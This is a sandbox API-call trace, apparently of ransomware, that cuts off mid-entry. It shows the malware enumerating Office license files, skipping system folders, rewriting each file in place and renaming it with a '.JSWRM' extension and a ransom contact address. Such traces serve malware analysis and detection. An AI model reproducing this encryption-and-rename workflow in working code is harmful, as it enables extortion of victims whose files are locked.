[0105.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0105.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0105.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0105.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.615] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial3-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial3-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial3-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial3-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0105.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0105.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0105.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.615] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.615] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6de85cd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6de85cd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe70e34ec, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", cAlternateFileName="O35C5F~1.XRM")) returned 1 [0105.615] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.616] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.616] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.616] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.616] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.616] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.616] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.616] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.616] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.616] lstrcmpiW (lpString1="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0105.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0105.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0105.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0105.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0105.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0105.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0105.616] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0105.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.616] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.616] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0105.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial3-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.617] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11630) returned 1 [0105.617] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0105.617] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0105.623] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.623] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0105.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.624] CloseHandle (hObject=0x45c) returned 1 [0105.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0105.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0105.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0105.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0105.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0105.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0105.624] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.624] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial3-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial3-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial3-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0105.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0105.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0105.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.625] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6d2994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6d2994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6e5ac86, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial4-pl.xrm-ms", cAlternateFileName="O3C05D~1.XRM")) returned 1 [0105.625] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-pl.xrm-ms", lpString2=".") returned 1 [0105.625] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-pl.xrm-ms", lpString2="..") returned 1 [0105.625] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-pl.xrm-ms", lpString2="...") returned 1 [0105.625] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-pl.xrm-ms", lpString2="windows") returned -1 [0105.625] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-pl.xrm-ms", lpString2="recovery") returned -1 [0105.625] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.625] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.625] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.625] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.625] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-pl.xrm-ms", lpString2="msocache") returned 1 [0105.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0105.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial4-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0105.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial4-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0105.625] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0105.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0105.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial4-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0105.625] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial4-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0105.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0105.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0105.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0105.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0105.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial4-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.626] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0105.626] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0105.626] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.629] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.629] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.629] CloseHandle (hObject=0x45c) returned 1 [0105.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0105.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0105.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0105.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0105.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0105.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0105.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.629] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial4-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial4-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial4-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0105.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0105.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0105.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.630] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6d03706, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6d03706, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6ea70e0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f31, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial4-ppd.xrm-ms", cAlternateFileName="O35E87~1.XRM")) returned 1 [0105.630] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ppd.xrm-ms", lpString2=".") returned 1 [0105.630] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ppd.xrm-ms", lpString2="..") returned 1 [0105.630] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ppd.xrm-ms", lpString2="...") returned 1 [0105.630] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ppd.xrm-ms", lpString2="windows") returned -1 [0105.630] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.630] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.630] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.630] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.630] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.631] lstrcmpiW (lpString1="O365ProPlusR_SubTrial4-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0105.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial4-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial4-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0105.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0105.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial4-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial4-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0105.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0105.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0105.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0105.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial4-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.631] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24369) returned 1 [0105.631] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f30) returned 0x24c1d0 [0105.632] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5f30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5f30, lpOverlapped=0x0) returned 1 [0105.634] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.634] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5f30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5f30, lpOverlapped=0x0) returned 1 [0105.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.635] CloseHandle (hObject=0x45c) returned 1 [0105.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0105.635] MultiByteToWideChar (in: CodePage=0x0, 